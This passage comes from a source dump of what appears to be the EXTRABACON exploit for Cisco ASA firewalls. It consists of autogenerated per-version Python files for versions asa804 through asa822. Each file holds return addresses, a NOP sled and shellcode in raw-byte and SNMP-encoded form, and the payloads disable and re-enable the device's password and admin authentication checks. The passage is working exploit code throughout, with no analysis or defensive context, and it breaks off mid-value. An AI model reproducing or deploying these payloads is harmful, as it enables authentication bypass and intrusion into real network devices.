"\xb8\x29\xc1\x0d\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.41.193.13.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xbd\x3d\x61\x09\x50\xb8\x75\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.189.61.97.9.80.184.117.183.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xbd\x3d\x61\x09\x50\xb8\x75\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.189.61.97.9.80.184.117.183.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xb6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x65\x13\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.182.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.101.19.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x80\x65\x13\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xb6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.128.101.19.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.182.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x68\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.104.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xb0\x68\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.104.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa804_32.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa804-32" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9d\x06\x1f\x09" 11 | 12 | my_ret_addr_snmp = "157.6.31.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x89\xb1\x0e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.137.177.14.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x4c\x9f\x67\x09\x50\xb8\x15\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.76.159.103.9.80.184.21.183.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x4c\x9f\x67\x09\x50\xb8\x15\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.76.159.103.9.80.184.21.183.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\xb2\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x00\xb0\x17\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.178.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.0.176.23.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x00\xb0\x17\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\xb2\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.0.176.23.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.178.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\x69\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.105.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x30\x69\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.105.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa805.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa805" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xfd\x74\x1f\x09" 11 | 12 | my_ret_addr_snmp = "253.116.31.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x69\xe5\x0e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.105.229.14.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x6c\x4c\x68\x09\x50\xb8\x15\xb1\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.108.76.104.9.80.184.21.177.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x6c\x4c\x68\x09\x50\xb8\x15\xb1\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.108.76.104.9.80.184.21.177.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x85\xbd\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x20\x18\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.133.189.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.32.24.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x40\x20\x18\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x85\xbd\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.64.32.24.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.133.189.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x6b\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.107.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x80\x6b\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.128.107.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa821.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa821" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x93\xf2\x2b\x09" 11 | 12 | my_ret_addr_snmp = "147.242.43.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa822.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa822" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x96\x36\x1c\x09" 11 | 12 | my_ret_addr_snmp = "150.54.28.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xd9\xa5\x1d\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.217.165.29.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xaa\x1a\x84\x09\x50\xb8\x95\xee\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.170.26.132.9.80.184.149.238.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xaa\x1a\x84\x09\x50\xb8\x95\xee\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 